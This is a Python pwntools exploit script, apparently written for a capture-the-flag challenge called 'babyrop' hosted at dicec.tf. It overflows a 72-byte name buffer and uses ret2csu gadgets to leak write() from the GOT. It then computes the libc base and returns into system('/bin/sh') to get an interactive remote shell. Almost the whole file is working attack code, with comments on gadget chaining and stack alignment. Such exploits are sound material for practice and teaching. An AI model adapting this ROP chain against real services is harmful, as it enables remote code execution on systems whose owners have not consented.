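"""Exploit for the `babyrop` service: leak libc via ret2csu + write(), then ret2system.

Stage 1 overflows the name buffer (72 bytes to the saved return address), drives the
ret2csu gadget pair to call write(1, &GOT[write], 8), and returns into main so the
buffer can be overflowed a second time.
Stage 2 rebases libc on the leaked write() pointer and returns into
pop rdi; "/bin/sh"; system.
"""
from pwn import *

r = remote('dicec.tf', 31924)
elf = ELF('babyrop')
rop = ROP(elf)
# NOTE(review): every libc offset below comes from THIS file, so it must be the same
# build the remote process loads (use the challenge-provided libc if there is one).
# A mismatched libc makes libc.address and every address derived from it wrong.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc_write = libc.symbols['write']

PADDING = 72  # bytes from the start of the name buffer to the saved return address

# Garbage
r.readuntil(b'Your name: ')

# Part 1 - Obtaining libc base address
got_write = elf.symbols['got.write']
payload = b'A' * PADDING
# ret2csu gadget 1 (the __libc_csu_init register loader):
# pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
payload += p64(0x004011ca)
payload += p64(0)          # rbx = 0 so that call [r15 + rbx*8] dereferences r15 itself
payload += p64(1)          # rbp = 1 so rbx+1 == rbp and the csu loop exits after one call
payload += p64(1)          # r12 -> edi: fd 1 is STDOUT (the leak must come back to us)
payload += p64(got_write)  # r13 -> rsi: buffer to write from, i.e. the GOT slot of write
payload += p64(8)          # r14 -> rdx: byte count, one 64-bit pointer
payload += p64(got_write)  # r15: call [r15] == the libc write() pointer stored in the GOT
# ret2csu gadget 2: mov rdx, r14; mov rsi, r13; mov edi, r12d; call qword [r15 + rbx*8]
payload += p64(0x004011b0)
# After the call the csu tail falls through add rsp, 8 and six pops before its ret,
# which consumes exactly these 56 bytes of junk.
payload += b'C' * 56
payload += p64(0x00401137)  # second instruction of main: re-enter it for a second overflow
r.sendline(payload)

# Calculate libc address. recvn() blocks until all 8 bytes have arrived; a plain
# recv(8)/read(8) may return a short read and make u64() raise.
address = u64(r.recvn(8))
libc.address = address - libc_write
log.info(f'Found write @ {hex(address)}')
log.info(f'Found libc base @ {hex(libc.address)}')
# A real libc mapping is page aligned; anything else means the leak was misread or the
# local libc does not match the remote one. Stop before spraying a garbage address.
if libc.address & 0xfff:
    log.error(f'libc base {hex(libc.address)} is not page aligned; wrong libc or bad leak')

# Garbage
r.readuntil(b'Your name: ')

# Part 2 - Execute shell
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
bin_sh = next(libc.search(b"/bin/sh\x00"))
system = libc.symbols['system']
payload = b'A' * PADDING
payload += p64(pop_rdi)
payload += p64(bin_sh)
# If system() dies on a movaps the stack is 8-byte misaligned at this point; inserting a
# bare `ret` gadget (rop.find_gadget(['ret'])[0]) right before system fixes that.
payload += p64(system)
r.sendline(payload)
r.interactive()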